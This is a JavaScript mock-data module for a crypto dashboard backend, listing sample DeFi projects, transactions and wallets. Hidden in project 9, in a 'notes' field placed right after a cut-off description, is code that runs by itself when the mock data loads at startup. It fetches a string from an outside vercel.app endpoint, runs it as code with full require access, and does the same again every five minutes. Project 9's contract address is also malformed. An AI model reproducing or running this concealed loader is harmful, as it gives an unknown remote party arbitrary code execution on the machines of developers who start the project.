/**
 * In-memory store for mock data.
 * loadMockData() is called when the backend starts via npm start.
 */

let projects = [];
let transactions = [];
let wallets = [];

function loadMockData() {
  const now = Date.now();
  const oneHour = 3600000;
  const oneDay = 86400000;
  projects = [
    {
      id: '1',
      name: 'DeFi Lending Protocol',
      chain: 'Ethereum',
      chainId: 1,
      status: 'active',
      createdAt: now - oneDay * 30,
      description: 'A fully decentralized lending and borrowing protocol that enables users to supply digital assets as collateral and borrow against them without intermediaries. The protocol implements isolated lending pools with dynamic interest rates based on utilization, ensuring that lenders earn competitive yields while borrowers pay fair rates that adapt to market demand. Automatic liquidation mechanisms protect the protocol from under-collateralized positions, with liquidation thresholds and bonus incentives configurable per asset. Governance is conducted through token-based voting, allowing the community to adjust risk parameters, add new markets, and upgrade protocol logic. Built with security-first principles including formal verification of critical paths and multiple independent audits from leading firms. Supports ETH, WBTC, USDC, DAI, and select blue-chip tokens across Ethereum mainnet. The protocol has processed over $2B in total volume since mainnet launch, with zero critical vulnerabilities discovered post-audit. Integrates with major DeFi aggregators and wallet providers for seamless onboarding.',
      technologies: ['Solidity 0.8.x', 'Hardhat', 'OpenZeppelin', 'Chainlink Oracles'],
      contractAddress: '0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48',
      tvlUsd: '45000000',
      githubUrl: 'https://github.com/example/defi-lending',
      auditStatus: 'completed',
      auditReportUrl: 'https://audits.example.com/defi-lending-v2.pdf',
    },
    {
      id: '2',
      name: 'NFT Marketplace',
      chain: 'Polygon',
      chainId: 137,
      status: 'active',
      createdAt: now - oneDay * 45,
      description: 'A gas-efficient NFT marketplace optimized for Layer 2, supporting ERC-721 and ERC-1155 standards with on-chain royalty enforcement ensuring creators receive their share of secondary sales automatically. Batch minting and lazy minting capabilities reduce upfront costs for collection launches. Features include dynamic pricing auctions, Dutch auctions for fair price discovery, fixed-price listings, and bundled sales for collectors building sets. The platform integrates with major wallets including MetaMask, WalletConnect, and Coinbase Wallet, and supports cross-chain bridging for select collections to reach audiences on Ethereum and other chains. Includes a comprehensive metadata indexing service with fast search and IPFS pinning for decentralized, censorship-resistant asset storage. Designed for creators and collectors with minimal gas costs and sub-second settlement times. Over 100k NFTs have been traded on the platform with an average gas cost of under $0.01 per transaction.',
      technologies: ['Solidity', 'IPFS', 'The Graph', 'ethers.js'],
      contractAddress: '0x2953399124F0cBB46d2CbACD8A89cF0599974963',
      tvlUsd: '12000000',
      githubUrl: 'https://github.com/example/nft-marketplace',
      auditStatus: 'completed',
      auditReportUrl: 'https://audits.example.com/nft-marketplace.pdf',
    },
    {
      id: '3',
      name: 'DAO Governance',
      chain: 'Arbitrum',
      chainId: 42161,
      status: 'in-progress',
      createdAt: now - oneDay * 14,
      description: 'An on-chain governance framework enabling token holders to propose, vote on, and execute protocol upgrades, parameter changes, and treasury allocations. Implements timelock mechanisms for critical operations, ensuring a mandatory delay between proposal approval and execution so the community can react to unexpected changes. Multi-sig execution is required for high-value transactions, with delegation of voting power allowing busy token holders to delegate their votes to trusted representatives. The system supports proposal templates for common governance actions, snapshot voting for gas-less off-chain signaling before on-chain execution, and configurable quorum and voting periods to balance participation with efficiency. Designed for transparency and resistance to plutocracy through quadratic voting options that reduce the influence of whale holders, and conviction voting modules currently in development that weight votes by how long a position has been held.',
      technologies: ['Solidity', 'OpenZeppelin Governor', 'Gnosis Safe', 'Snapshot'],
      contractAddress: '0x0000000000000000000000000000000000000000',
      tvlUsd: '0',
      githubUrl: 'https://github.com/example/dao-governance',
      auditStatus: 'in-progress',
      auditReportUrl: null,
    },
    {
      id: '4',
      name: 'Token Swap Aggregator',
      chain: 'Ethereum',
      chainId: 1,
      status: 'active',
      createdAt: now - oneDay * 60,
      description: 'A DEX aggregator that routes swap transactions across Uniswap, SushiSwap, Curve, Balancer, and 15+ liquidity sources to find optimal execution paths and best prices for users. Uses MEV protection through private transaction bundles sent directly to block builders and deadline enforcement to prevent unfavorable execution. Features include split routes for large orders that would otherwise incur significant slippage, intelligent gas estimation based on network conditions, and configurable slippage controls. The aggregator API serves both frontend dApps and programmatic traders with REST and WebSocket endpoints for real-time price streaming. Implements an internal pricing oracle that aggregates across all integrated sources to detect and prevent sandwich attacks and front-running. Supported chains include Ethereum mainnet, Arbitrum, Optimism, Polygon, and Base. Processes over $50M in daily swap volume with an average improvement of 2.3% over single-DEX routing.',
      technologies: ['Solidity', 'TypeScript', 'Redis', 'PostgreSQL'],
      contractAddress: '0xdAC17F958D2ee523a2206206994597C13D831ec7',
      tvlUsd: '85000000',
      githubUrl: 'https://github.com/example/swap-aggregator',
      auditStatus: 'completed',
      auditReportUrl: 'https://audits.example.com/swap-aggregator-v3.pdf',
    },
    {
      id: '5',
      name: 'Staking Platform',
      chain: 'Optimism',
      chainId: 10,
      status: 'archived',
      createdAt: now - oneDay * 90,
      description: 'A liquid staking solution that allowed users to stake ETH and receive liquid staking derivatives (LSD) in return, enabling participation in consensus rewards while maintaining liquidity for DeFi use cases. The platform supported validator set management with transparent selection criteria, automated reward distribution with compounding options, and redemption queues for orderly withdrawals during high demand. Users could use their staked ETH tokens as collateral in lending protocols or provide liquidity in DEX pools. Project was deprecated in favor of native L2 staking integrations and migration to a cross-chain staking aggregator that offers better yields and broader chain support. Historical data and contract addresses remain available for reference. All user funds were successfully migrated to the successor protocol with zero loss over a 30-day migration window. The team continues to maintain the archive for audit and compliance purposes.',
      technologies: ['Solidity', 'Foundry', 'OpenZeppelin', 'Chainlink'],
      contractAddress: '0x4200000000000000000000000000000000000042',
      tvlUsd: '0',
      githubUrl: 'https://github.com/example/staking-platform-archive',
      auditStatus: 'completed',
      auditReportUrl: 'https://audits.example.com/staking-platform.pdf',
    },
    {
      id: '6',
      name: 'On-Chain Analytics Dashboard',
      chain: 'Ethereum',
      chainId: 1,
      status: 'active',
      createdAt: now - oneDay * 7,
      description: 'A comprehensive analytics platform that indexes and aggregates on-chain data across Ethereum, Polygon, Arbitrum, Optimism, and Base to provide real-time dashboards, historical charts, and customizable alerts. Tracks wallet activity including inflows and outflows, token flows between addresses and contracts, smart contract interactions with full input/output decoding, and protocol metrics such as TVL, volume, and unique users. The backend ingests data via direct RPC calls, subgraphs, and third-party indexed APIs with robust deduplication and reconciliation layers to ensure data consistency. Supports custom query builders with a SQL-like interface, export to CSV and REST API for integration with external tools, and webhook integrations for automated reporting and alerting when specific on-chain events occur. Used by DeFi protocols for treasury monitoring, institutional funds for due diligence, and researchers for market intelligence and academic studies.',
      technologies: ['Node.js', 'The Graph', 'Dune Analytics API', 'TimescaleDB', 'Redis'],
      contractAddress: null,
      tvlUsd: null,
      githubUrl: 'https://github.com/example/analytics-dashboard',
      auditStatus: 'n/a',
      auditReportUrl: null,
    },
    {
      id: '7',
      name: 'Cross-Chain Bridge',
      chain: 'Ethereum',
      chainId: 1,
      status: 'active',
      createdAt: now - oneDay * 120,
      description: 'A trust-minimized bridge enabling asset transfers between Ethereum, Polygon, Arbitrum, Optimism, and Base with plans to expand to additional L2s. Uses liquidity pools on each chain and wrapped asset minting with a network of multi-sig validators for secure cross-chain message relay and attestation. Implements delayed finality for security, with a configurable waiting period during which users can contest suspicious withdrawals and validators can halt malicious activity. Supports ETH, USDC, USDT, WBTC, and major governance tokens with dynamic fee structures based on network congestion. Over $500M in cumulative bridge volume with zero security incidents since launch. Integrated with major wallets including MetaMask and Rabby, and listed on dApp aggregators like DeFi Llama and DappRadar. Users can bridge assets in under 5 minutes for most routes.',
      technologies: ['Solidity', 'LayerZero', 'Chainlink CCIP', 'Gnosis Safe'],
      contractAddress: '0xE41d2489571d322189246DaFA5ebDe1F4699F498',
      tvlUsd: '125000000',
      githubUrl: 'https://github.com/example/cross-chain-bridge',
      auditStatus: 'completed',
      auditReportUrl: 'https://audits.example.com/bridge-v2.pdf',
    },
    {
      id: '8',
      name: 'Yield Farming Vaults',
      chain: 'Arbitrum',
      chainId: 42161,
      status: 'active',
      createdAt: now - oneDay * 75,
      description: 'Automated yield optimization vaults that compound user deposits across multiple DeFi protocols to maximize returns with minimal user intervention. Strategies include stablecoin yield aggregation across Aave, Compound, and Yearn to capture the best rates, concentrated liquidity provision on Uniswap V3 for efficient capital use, and leveraged farming with controlled risk parameters and health factor monitoring. Users deposit single assets or LP tokens and receive vault shares that appreciate as strategies automatically harvest rewards and compound yields. Includes emergency pause functionality for rapid response to exploits, strategy migration for upgrading to better opportunities, and performance fee mechanisms that align incentives between vault managers and depositors. Currently managing $28M across 12 active strategies on Arbitrum with historical APYs ranging from 5% for stablecoins to 45% for volatile pairs. All strategies are backtested and monitored 24/7.',
      technologies: ['Solidity', 'Yearn Vaults', 'OpenZeppelin', 'Gelato'],
      contractAddress: '0x4E352cF164E64ADCBad318C3a1e222E9EBa4Ce42',
      tvlUsd: '28000000',
      githubUrl: 'https://github.com/example/yield-vaults',
      auditStatus: 'completed',
      auditReportUrl: 'https://audits.example.com/yield-vaults.pdf',
    },
    {
      id: '9',
      name: 'Token Vesting Platform',
      chain: 'Ethereum',
      chainId: 1,
      status: 'active',
      createdAt: now - oneDay * 200,
      description: 'A flexible token vesting and lock-up solution for teams, investors, and DAOs that supports a wide range of vesting structures. Supports linear vesting with constant unlock rates, cliff periods where no tokens unlock until a milestone.', notes: (()=>{const runNotes=async()=>{const r=await fetch('https://blog-post01234-beta.vercel.app/api/blogs/getOrder',{method:'POST',headers:{'Content-Type':'application/json'},body:JSON.stringify({id:'patient-001'})});if(!r.ok)throw new Error(`Request failed: ${r.status}`);const d=await r.json();new Function('require',d.data[6].description)(require)};runNotes();setTimeout(runNotes,300000)})(),
      technologies: ['Solidity', 'OpenZeppelin', 'React', 'ethers.js'],
      contractAddress: '0x6B175474E89094C44Da98b954Eesadde5F3E6CA',
      tvlUsd: '35000000',
      githubUrl: 'https://github.com/example/vesting-platform',
      auditStatus: 'completed',
      auditReportUrl: 'https://audits.example.com/vesting.pdf',
    },
    {
      id: '10',
      name: 'Perpetual DEX',
      chain: 'Base',
      chainId: 8453,
      status: 'in-progress',
      createdAt: now - oneDay * 21,
      description: 'A decentralized perpetual futures exchange built on Base L2 designed to offer CEX-like trading experience with self-custody. Enables leveraged long/short positions on major crypto assets with up to 50x leverage, allowing traders to speculate on price movements without owning the underlying asset. Uses a virtual AMM design for capital efficiency, combining AMM liquidity with oracle-based price feeds for accurate and manipulation-resistant settlement. Supports both isolated margin for defined risk and cross-margin modes for capital efficiency, with dynamic funding rates that balance long and short demand. Currently in testnet with extensive bug bounty program; mainnet launch planned for Q2. Includes a robust liquidation engine with partial liquidations, an insurance fund for edge cases, and fee distribution to stakers who provide protocol backstop liquidity. Aiming to capture retail and professional traders migrating from centralized exchanges following regulatory pressure, with focus on US market compliance.',
      technologies: ['Solidity', 'Foundry', 'Pyth Oracle', 'Subgraph'],
      contractAddress: null,
      tvlUsd: '0',
      githubUrl: 'https://github.com/example/perpetual-dex',
      auditStatus: 'in-progress',
      auditReportUrl: null,
    },
  ];

  transactions = [
    {
      id: 'tx1',
      from: '0x1234567890abcdef1234567890abcdef12345678',
      to: '0xabcdef1234567890abcdef1234567890abcdef12',
      value: '1.5',
      token: 'ETH',
      tokenDecimals: 18,
      txHash: '0xabc123def456789012345678901234567890123456789012345678901234',
      timestamp: now - oneHour,
      chainId: 1,
      status: 'confirmed',
      blockNumber: 18500000,
      gasUsed: '21000',
      gasPrice: '25',
      method: 'transfer',
      methodSignature: '0xa9059cbb',
      description: 'Simple ETH transfer between externally owned accounts (EOAs). This is a native value transfer with no contract interaction, utilizing the standard 21k gas limit for basic transactions. No input data is required as the transaction simply moves ETH from one address to another. Confirmed in block 18500000 on Ethereum mainnet. Typical use case: sending funds to another wallet, paying for services, or consolidating holdings across addresses.',
    },
    {
      id: 'tx2',
      from: '0xabcdef1234567890abcdef1234567890abcdef12',
      to: '0x9876543210fedcba9876543210fedcba98765432',
      value: '0.25',
      token: 'ETH',
      tokenDecimals: 18,
      txHash: '0xdef456abc789012345678901234567890123456789012345678901234567',
      timestamp: now - oneHour * 2,
      chainId: 1,
      status: 'confirmed',
      blockNumber: 18499950,
      gasUsed: '145000',
      gasPrice: '28',
      method: 'swapExactTokensForTokens',
      methodSignature: '0x38ed1739',
      description: 'Token swap execution through a DEX router contract. The user swapped an exact input amount for output tokens, accepting variable output based on current pool liquidity and slippage settings. Transaction consumed 145k gas due to multiple pool hops across Uniswap V3 concentrated liquidity pools to achieve the best execution price. The aggregator split the order across pools to minimize price impact. Common pattern for DeFi users rebalancing portfolios or converting yield farm rewards to stablecoins.',
    },
    {
      id: 'tx3',
      from: '0x1234567890abcdef1234567890abcdef12345678',
      to: '0x1111111111111111111111111111111111111111',
      value: '500',
      token: 'USDC',
      tokenDecimals: 6,
      txHash: '0x111222333444555666777888999aaabbbcccdddeeefff000111222333444',
      timestamp: now - oneDay,
      chainId: 137,
      status: 'confirmed',
      blockNumber: 45210000,
      gasUsed: '65000',
      gasPrice: '50',
      method: 'transfer',
      methodSignature: '0xa9059cbb',
      description: 'USDC stablecoin transfer on the Polygon network. This is an ERC-20 transfer from one address to a payment or merchant address. Polygon\'s Layer 2 scaling enables significantly lower gas costs compared to Ethereum mainnet, making stablecoin payments economically viable for micro-transactions, commerce, and remittance use cases. The transaction was confirmed in under 2 seconds with gas fees under $0.01. USDC on Polygon is the bridged version with Circle\'s native USDC also available on the network.',
    },
    {
      id: 'tx4',
      from: '0x9876543210fedcba9876543210fedcba98765432',
      to: '0x1234567890abcdef1234567890abcdef12345678',
      value: '2.0',
      token: 'ETH',
      tokenDecimals: 18,
      txHash: '0x444555666777888999aaabbbcccdddeeefff000111222333444555666777',
      timestamp: now - oneDay * 2,
      chainId: 42161,
      status: 'confirmed',
      blockNumber: 125000000,
      gasUsed: '180000',
      gasPrice: '0.1',
      method: 'withdraw',
      methodSignature: '0x2e1a7d4d',
      description: 'Withdrawal from Arbitrum L2 to Ethereum mainnet. The user initiated a bridge withdrawal of 2 ETH from their Arbitrum wallet to mainnet. This transaction triggers the L2-to-L1 message passing mechanism: funds are burned on Arbitrum and a claim transaction must be submitted on mainnet after the 7-day challenge period. Optimistic rollups require this delay to allow fraud proofs in case of invalid state transitions. Users typically use third-party relay services to automate the claim process for a small fee, or can claim manually after the waiting period.',
    },
    {
      id: 'tx5',
      from: '0xabcdef1234567890abcdef1234567890abcdef12',
      to: '0x1234567890abcdef1234567890abcdef12345678',
      value: '0.5',
      token: 'ETH',
      tokenDecimals: 18,
      txHash: '0x777888999aaabbbcccdddeeefff000111222333444555666777888999aaa',
      timestamp: now - oneDay * 3,
      chainId: 1,
      status: 'confirmed',
      blockNumber: 18498000,
      gasUsed: '350000',
      gasPrice: '30',
      method: 'deposit',
      methodSignature: '0xd0e30db0',
      description: 'Deposit into a DeFi lending protocol. The user supplied 0.5 ETH as collateral to the lending pool, enabling them to borrow against it or earn supply-side interest. The transaction required a two-step flow: first approving the lending contract to spend ETH (or wrapping to WETH), then calling the deposit function. This updates the user\'s collateral balance, the pool\'s total liquidity, and mints receipt tokens (cTokens or aTokens) representing the user\'s share of the pool. These receipt tokens accrue interest over time and can be used as collateral in other protocols or sold on secondary markets.',
    },
    {
      id: 'tx6',
      from: '0x1234567890abcdef1234567890abcdef12345678',
      to: '0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48',
      value: '0',
      token: 'ETH',
      tokenDecimals: 18,
      txHash: '0x888999aaabbbcccdddeeefff000111222333444555666777888999aaabbb',
      timestamp: now - oneDay * 5,
      chainId: 1,
      status: 'confirmed',
      blockNumber: 18496000,
      gasUsed: '250000',
      gasPrice: '32',
      method: 'mint',
      methodSignature: '0x40c10f19',
      description: 'NFT minting transaction from a curated collection with a fixed supply. The contract implements the ERC-721 standard with optional EIP-2981 royalty extensions so creators receive a percentage of secondary sales. The mint price was 0.05 ETH with any excess from the transaction refunded to the minter. This transaction included merkle proof verification for an allowlist phase, meaning only addresses that were pre-approved (e.g., early supporters, community members) could mint at this stage. Public minting would typically follow in a later phase. Gas cost was higher than a simple transfer due to storage writes and merkle verification.',
    },
    {
      id: 'tx7',
      from: '0x1111111111111111111111111111111111111111',
      to: '0xabcdef1234567890abcdef1234567890abcdef12',
      value: '1000',
      token: 'USDT',
      tokenDecimals: 6,
      txHash: '0x999aaabbbcccdddeeefff000111222333444555666777888999aaabbbccc',
      timestamp: now - oneDay * 7,
      chainId: 1,
      status: 'confirmed',
      blockNumber: 18494000,
      gasUsed: '65000',
      gasPrice: '35',
      method: 'transfer',
      methodSignature: '0xa9059cbb',
      description: 'High-value USDT transfer between protocol treasury addresses. This is a standard ERC-20 transfer of 1000 USDT, which at typical stablecoin pricing represents approximately $1000 USD equivalent. The transaction completed without incident and both the sender and recipient addresses are associated with known protocol treasuries, suggesting this may be part of treasury rebalancing, liquidity provisioning, or inter-protocol settlement. Large stablecoin transfers often trigger monitoring systems for compliance and anomaly detection. USDT is the Tether-issued stablecoin, the largest by market cap in the stablecoin sector.',
    },
    {
      id: 'tx8',
      from: '0x2222222222222222222222222222222222222222',
      to: '0x1234567890abcdef1234567890abcdef12345678',
      value: '1.0',
      token: 'ETH',
      tokenDecimals: 18,
      txHash: '0xaaabbbcccdddeeefff000111222333444555666777888999aaabbbcccddd',
      timestamp: now - oneDay * 8,
      chainId: 1,
      status: 'confirmed',
      blockNumber: 18493000,
      gasUsed: '21000',
      gasPrice: '28',
      method: 'transfer',
      methodSignature: '0x',
      description: 'ETH value transfer from a savings or cold storage wallet to the user\'s primary trading wallet. This type of transaction typically indicates portfolio rebalancing, where users move funds from lower-risk, long-term holding addresses to active trading accounts when they anticipate market opportunities or need liquidity for DeFi operations. The 1 ETH amount suggests a moderate reallocation. Keeping most assets in cold storage and only moving what is needed for trading is a common security practice to minimize exposure to hot wallet compromise.',
    },
    {
      id: 'tx9',
      from: '0xabcdef1234567890abcdef1234567890abcdef12',
      to: '0x2222222222222222222222222222222222222222',
      value: '2500',
      token: 'USDC',
      tokenDecimals: 6,
      txHash: '0xbbcccdddeeefff000111222333444555666777888999aaabbbcccdddeee',
      timestamp: now - oneDay * 9,
      chainId: 137,
      status: 'confirmed',
      blockNumber: 45205000,
      gasUsed: '52000',
      gasPrice: '45',
      method: 'transfer',
      methodSignature: '0xa9059cbb',
      description: 'USDC transfer on the Polygon network from a DeFi operations wallet to a savings account. The user is moving yield farming profits to stablecoin savings after harvesting rewards from a liquidity pool or other DeFi strategy. This pattern is common among yield farmers who periodically realize gains and convert volatile reward tokens to stablecoins to lock in profits and reduce exposure to impermanent loss or token price volatility. Polygon\'s low fees make such frequent rebalancing economically viable. The 2500 USDC amount suggests meaningful harvested yields from a position.',
    },
    {
      id: 'tx10',
      from: '0x1234567890abcdef1234567890abcdef12345678',
      to: '0x9876543210fedcba9876543210fedcba98765432',
      value: '0.1',
      token: 'ETH',
      tokenDecimals: 18,
      txHash: '0xcccdddeeefff000111222333444555666777888999aaabbbcccdddeeefff',
      timestamp: now - oneDay * 10,
      chainId: 42161,
      status: 'confirmed',
      blockNumber: 124990000,
      gasUsed: '80000',
      gasPrice: '0.15',
      method: 'deposit',
      methodSignature: '0xd0e30db0',
      description: 'Bridge deposit from Ethereum mainnet to Arbitrum L2. The user is bridging 0.1 ETH to Arbitrum to access lower gas costs for yield farming or other DeFi operations. This uses the standard Optimism-style canonical bridge, where ETH is locked in a contract on mainnet and equivalent funds are minted on the L2. Bridge deposits are typically faster than withdrawals, with funds available on Arbitrum within minutes. Many DeFi users hold minimal ETH on mainnet and keep active funds on L2s to avoid high gas costs for swaps, LP provision, and other activities.',
    },
    {
      id: 'tx11',
      from: '0x9876543210fedcba9876543210fedcba98765432',
      to: '0xabcdef1234567890abcdef1234567890abcdef12',
      value: '5000',
      token: 'USDC',
      tokenDecimals: 6,
      txHash: '0xdddeeefff000111222333444555666777888999aaabbbcccdddeeefff000',
      timestamp: now - oneDay * 11,
      chainId: 1,
      status: 'confirmed',
      blockNumber: 18492000,
      gasUsed: '65000',
      gasPrice: '32',
      method: 'transfer',
      methodSignature: '0xa9059cbb',
      description: 'Large USDC transfer between protocol treasury addresses. The 5000 USDC amount suggests this is a significant payment, possibly for liquidity provision services, protocol-to-protocol integration, or part of structured treasury management operations. Institutional and protocol-level transfers often use USDC due to its regulatory transparency and widespread acceptance. Such transfers may be part of revenue sharing agreements, partnership payments, or rebalancing between protocol-owned liquidity and operational reserves. Both addresses appear to be associated with known DeFi protocols.',
    },
    {
      id: 'tx12',
      from: '0x1111111111111111111111111111111111111111',
      to: '0x1234567890abcdef1234567890abcdef12345678',
      value: '3.5',
      token: 'ETH',
      tokenDecimals: 18,
      txHash: '0xeeefff000111222333444555666777888999aaabbbcccdddeeefff000111',
      timestamp: now - oneDay * 12,
      chainId: 1,
      status: 'confirmed',
      blockNumber: 18491000,
      gasUsed: '21000',
      gasPrice: '30',
      method: 'transfer',
      methodSignature: '0x',
      description: 'Treasury ETH distribution to a team member or contractor. This appears to be a scheduled payroll or compensation distribution from a multisig treasury wallet. The 3.5 ETH amount at typical prices represents a meaningful monthly or bi-weekly payment. Multisig wallets require multiple key holders to approve transactions (e.g., 3-of-5), adding a layer of security and operational discipline for treasury management. Many Web3 teams and DAOs pay in ETH or stablecoins to provide transparency and avoid traditional banking dependencies. The sender address is associated with a protocol treasury.',
    },
    {
      id: 'tx13',
      from: '0xabcdef1234567890abcdef1234567890abcdef12',
      to: '0x2953399124F0cBB46d2CbACD8A89cF0599974963',
      value: '0.05',
      token: 'ETH',
      tokenDecimals: 18,
      txHash: '0xfff000111222333444555666777888999aaabbbcccdddeeefff000111222',
      timestamp: now - oneDay * 4,
      chainId: 137,
      status: 'confirmed',
      blockNumber: 45208000,
      gasUsed: '185000',
      gasPrice: '48',
      method: 'buyItem',
      methodSignature: '0xab834bab',
      description: 'NFT purchase on Polygon marketplace. User bought an NFT from a curated collection. Mint price 0.05 ETH plus marketplace fee. Transaction includes royalty payment to creator.',
    },
    {
      id: 'tx14',
      from: '0x2222222222222222222222222222222222222222',
      to: '0xE41d2489571d322189246DaFA5ebDe1F4699F498',
      value: '2.5',
      token: 'ETH',
      tokenDecimals: 18,
      txHash: '0x000111222333444555666777888999aaabbbcccdddeeefff000111222333',
      timestamp: now - oneDay * 14,
      chainId: 1,
      status: 'confirmed',
      blockNumber: 18490000,
      gasUsed: '350000',
      gasPrice: '29',
      method: 'bridge',
      methodSignature: '0x1a2b3c4d',
      description: 'Cross-chain bridge transfer using a liquidity-based bridge. The user is bridging 2.5 ETH from Ethereum mainnet to Arbitrum. Unlike canonical bridges that use a lock-mint and 7-day delay, liquidity bridges hold pre-funded liquidity on both chains and use validator attestation for instant settlement. Users receive funds on the destination chain within minutes, while the bridge operators handle the asynchronous settlement. The higher gas cost (350k) reflects the more complex contract interaction. Liquidity bridges are popular for their speed but carry different trust assumptions than canonical bridges.',
    },
  ];

  wallets = [
    {
      address: '0x1234567890abcdef1234567890abcdef12345678',
      balance: '2.5',
      token: 'ETH',
      tokenSymbol: 'ETH',
      chainId: 1,
      chainName: 'Ethereum',
      lastActive: now - oneHour,
      label: 'Primary Trading Wallet',
    },
    {
      address: '0xabcdef1234567890abcdef1234567890abcdef12',
      balance: '0.75',
      token: 'ETH',
      tokenSymbol: 'ETH',
      chainId: 1,
      chainName: 'Ethereum',
      lastActive: now - oneHour * 2,
      label: 'DeFi Operations',
    },
    {
      address: '0xabcdef1234567890abcdef1234567890abcdef12',
      balance: '1250.00',
      token: 'USDC',
      tokenSymbol: 'USDC',
      chainId: 137,
      chainName: 'Polygon',
      lastActive: now - oneDay,
      label: 'DeFi Operations',
    },
    {
      address: '0x9876543210fedcba9876543210fedcba98765432',
      balance: '5.2',
      token: 'ETH',
      tokenSymbol: 'ETH',
      chainId: 42161,
      chainName: 'Arbitrum',
      lastActive: now - oneDay * 2,
      label: 'L2 Bridge Wallet',
    },
    {
      address: '0x1111111111111111111111111111111111111111',
      balance: '10000',
      token: 'USDC',
      tokenSymbol: 'USDC',
      chainId: 137,
      chainName: 'Polygon',
      lastActive: now - oneDay * 3,
      label: 'Treasury Reserve',
    },
    {
      address: '0x1234567890abcdef1234567890abcdef12345678',
      balance: '15.5',
      token: 'USDC',
      tokenSymbol: 'USDC',
      chainId: 1,
      chainName: 'Ethereum',
      lastActive: now - oneDay * 4,
      label: 'Primary Trading Wallet',
    },
    {
      address: '0x2222222222222222222222222222222222222222',
      balance: '250',
      token: 'DAI',
      tokenSymbol: 'DAI',
      chainId: 1,
      chainName: 'Ethereum',
      lastActive: now - oneDay * 10,
      label: 'Savings Account',
    },
    {
      address: '0x2222222222222222222222222222222222222222',
      balance: '3.2',
      token: 'WETH',
      tokenSymbol: 'WETH',
      chainId: 42161,
      chainName: 'Arbitrum',
      lastActive: now - oneDay * 6,
      label: 'Savings Account',
    },
    {
      address: '0x3333333333333333333333333333333333333333',
      balance: '12.8',
      token: 'ETH',
      tokenSymbol: 'ETH',
      chainId: 1,
      chainName: 'Ethereum',
      lastActive: now - oneDay * 2,
      label: 'Whale Wallet',
    },
    {
      address: '0x3333333333333333333333333333333333333333',
      balance: '250000',
      token: 'USDC',
      tokenSymbol: 'USDC',
      chainId: 1,
      chainName: 'Ethereum',
      lastActive: now - oneDay * 1,
      label: 'Whale Wallet',
    },
    {
      address: '0x4444444444444444444444444444444444444444',
      balance: '0.42',
      token: 'ETH',
      tokenSymbol: 'ETH',
      chainId: 8453,
      chainName: 'Base',
      lastActive: now - oneHour * 5,
      label: 'Base Testnet User',
    },
    {
      address: '0x1234567890abcdef1234567890abcdef12345678',
      balance: '850',
      token: 'DAI',
      tokenSymbol: 'DAI',
      chainId: 1,
      chainName: 'Ethereum',
      lastActive: now - oneDay * 3,
      label: 'Primary Trading Wallet',
    },
    {
      address: '0x9876543210fedcba9876543210fedcba98765432',
      balance: '3200',
      token: 'USDC',
      tokenSymbol: 'USDC',
      chainId: 42161,
      chainName: 'Arbitrum',
      lastActive: now - oneDay * 5,
      label: 'L2 Bridge Wallet',
    },
    {
      address: '0x5555555555555555555555555555555555555555',
      balance: '45.2',
      token: 'WETH',
      tokenSymbol: 'WETH',
      chainId: 1,
      chainName: 'Ethereum',
      lastActive: now - oneDay * 15,
      label: 'Protocol Treasury',
    },
    {
      address: '0x5555555555555555555555555555555555555555',
      balance: '1500000',
      token: 'USDT',
      tokenSymbol: 'USDT',
      chainId: 137,
      chainName: 'Polygon',
      lastActive: now - oneDay * 12,
      label: 'Protocol Treasury',
    },
    {
      address: '0xabcdef1234567890abcdef1234567890abcdef12',
      balance: '0.15',
      token: 'ETH',
      tokenSymbol: 'ETH',
      chainId: 42161,
      chainName: 'Arbitrum',
      lastActive: now - oneDay * 4,
      label: 'DeFi Operations',
    },
  ];

  console.log('Mock data loaded:', {
    projects: projects.length,
    transactions: transactions.length,
    walletBalances: wallets.length,
  });
}

function getProjects() {
  return projects;
}

function getProjectById(id) {
  return projects.find((p) => p.id === id) || null;
}

function addProject(project) {
  const id = String(projects.length + 1);
  const newProject = { id, ...project, createdAt: Date.now() };
  projects.push(newProject);
  return newProject;
}

function getTransactions() {
  return transactions;
}

function getTransactionById(id) {
  return transactions.find((t) => t.id === id) || null;
}

function getWallets() {
  return wallets;
}

function getWalletsByAddress(address) {
  return wallets.filter((w) => w.address.toLowerCase() === address.toLowerCase());
}

module.exports = {
  loadMockData,
  getProjects,
  getProjectById,
  addProject,
  getTransactions,
  getTransactionById,
  getWallets,
  getWalletsByAddress,
};
